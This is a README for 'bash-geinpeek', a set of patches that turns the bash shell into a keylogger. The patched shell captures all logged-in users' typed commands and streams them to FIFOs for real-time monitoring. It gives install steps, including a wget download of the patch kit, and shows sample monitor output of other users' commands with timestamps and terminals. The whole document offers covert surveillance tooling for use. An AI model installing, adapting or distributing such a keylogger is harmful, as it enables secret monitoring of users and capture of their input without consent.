bash-geinpeek
A keylogger tool that a set of patches for bash and a command, captures all logged in user inputs and sends it into fifos. then can be able to monitor those key-strokes in real-time.
1. get bash-3.0.tar.gz
2. tar xzvf bash-3.0.tar.gz
3. cd bash-3.0
4. wget http://www.chollian.net/~jyj9782/geinblues/stuff/bash-geinpeek/bash-3.0-
geinpeek-0.2.tar.gz
5. tar xzvf bash-3.0-geinpeek-0.2.tar.gz
6. patch < Makefile.in-geinpeek.diff
7. patch < [patch file name you wanna add]
patch kit list
- execute_cmd.c-geinpeek.diff ( not stable yet )
- shell.c-geinpeek.diff ( not good )
the forces with you man ~
NEW FEATURE:
[root@elizabeth bash-3.0]# ./ghelper s.txt
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty -al
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ whoami
[root@elizabeth bash-3.0]# ./ghelper s.txt -i
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:21:01 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
Mon Feb 13 03:21:02 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:21:03 2006 - [file@/dev/pts/38 /tmp]$ clear
above !s! marked command logs are executed in some shell script.
then -i flag of ghelper ignored standard output of them.